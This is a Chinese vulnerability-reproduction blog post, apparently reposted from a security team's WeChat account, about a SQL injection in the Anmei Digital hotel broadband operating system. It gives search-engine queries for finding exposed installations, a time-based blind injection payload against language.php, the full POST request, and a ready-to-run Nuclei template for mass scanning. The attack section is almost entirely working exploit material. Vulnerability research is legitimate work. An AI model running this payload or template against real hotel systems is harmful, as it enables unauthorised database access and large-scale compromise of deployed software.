【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

admin

138429
文章

113
评论

2024年2月16日11:25:20评论63 views1字数 2176阅读7分15秒阅读模式

资产收集

hunter：web.title=”酒店宽带运营系统”
fofa：title=”酒店宽带运营系统”
【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

页面效果

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

漏洞复现

访问language.php。
payload如下：

EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

整体报文如下：

POST /language.php HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Content-Type: application/x-www-form-urlencodedContent-Length: 264EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

Nuclei Poc

id: anmeishuzijiudianinfo:  name: anmeishuzijiudian  author: xxxx  severity: info  description: description  reference:    - https://  tags: tagsrequests:  - raw:      - |-        POST /language.php HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        Upgrade-Insecure-Requests: 1        Sec-Fetch-Dest: document        Sec-Fetch-Mode: navigate        Sec-Fetch-Site: none        Sec-Fetch-User: ?1        Content-Type: application/x-www-form-urlencoded        Content-Length: 264        EditStatus=2&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(2)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'duration&gt;=2'      - type: status        status:          - 200

Nuclie验证

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

原文始发于微信公众号（零点安全团队）：【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】安美数字酒店宽带运营系统SQL注入漏洞

资产收集

页面效果

漏洞复现

Nuclei Poc

Nuclie验证

Next.js中间件权限绕过漏洞 CVE-2025-29927

CrushFTP新安全漏洞：未授权访问和CVE-2025-31161

Langflow code接口存在远程代码执行漏洞CVE-2025-3248 附POC

nextjs中间件权限绕过漏洞（CVE-2025-29927）

Vite import存在任意文件读取漏洞CVE-2025-31125 附POC

CVE-2025-22457

elestio memos SSRF漏洞 (CVE-2025-22952)

Zyxel-NBG2105-身份验证绕过（CVE-2021-3297）

Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

H3C多系列路由器存在任意用户登录漏洞 POC

发表评论

在线咨询

微信